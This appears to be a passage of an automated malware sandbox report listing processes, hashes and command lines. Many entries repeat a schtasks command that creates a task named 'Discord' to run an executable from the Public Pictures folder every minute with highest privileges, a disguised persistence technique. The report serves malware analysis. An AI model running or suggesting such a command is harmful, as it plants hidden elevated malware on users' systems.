MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 548, Parent PID: 3172

General

Target ID:	64
Start time:	02:25:55
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	65
Start time:	02:25:55
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	66
Start time:	02:25:55
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5348, Parent PID: 2768

General

Target ID:	67
Start time:	02:25:55
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	68
Start time:	02:25:55
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	69
Start time:	02:25:58
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5188, Parent PID: 1600

General

Target ID:	70
Start time:	02:25:58
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	71
Start time:	02:25:58
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	72
Start time:	02:26:01
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7576, Parent PID: 7764

General

Target ID:	73
Start time:	02:26:01
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	74
Start time:	02:26:01
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	75
Start time:	02:26:04
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:	0x7ff78c890000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4380, Parent PID: 4920

General

Target ID:	76
Start time:	02:26:05
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7eeb80000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	77
Start time:	02:26:05
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:	0x7ff748080000
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	78
Start time:	02:26:08
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 2484, Parent PID: 2464

General

Target ID:	79
Start time:	02:26:08
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	80
Start time:	02:26:08
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	81
Start time:	02:26:11
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 4780, Parent PID: 5220

General

Target ID:	82
Start time:	02:26:11
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	83
Start time:	02:26:11
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	84
Start time:	02:26:14
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 1828, Parent PID: 4068

General

Target ID:	85
Start time:	02:26:14
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	86
Start time:	02:26:14
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	87
Start time:	02:26:17
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 1592, Parent PID: 2188

General

Target ID:	88
Start time:	02:26:17
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	89
Start time:	02:26:17
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	90
Start time:	02:26:20
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7852, Parent PID: 688

General

Target ID:	91
Start time:	02:26:20
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	92
Start time:	02:26:20
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	93
Start time:	02:26:23
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7036, Parent PID: 716

General

Target ID:	94
Start time:	02:26:23
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	95
Start time:	02:26:23
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST
Imagebase:
File size:	235'008 bytes
MD5 hash:	796B784E98008854C27F4B18D287BA30
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	96
Start time:	02:26:27
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Discord" /tr "C:\Users\Public\Pictures\xdwdUpdate.exe" /RL HIGHEST & exit
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: conhost.exePID: 7624, Parent PID: 5016

General

Target ID:	97
Start time:	02:26:27
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Target ID:	107
Start time:	02:26:33
Start date:	13/12/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false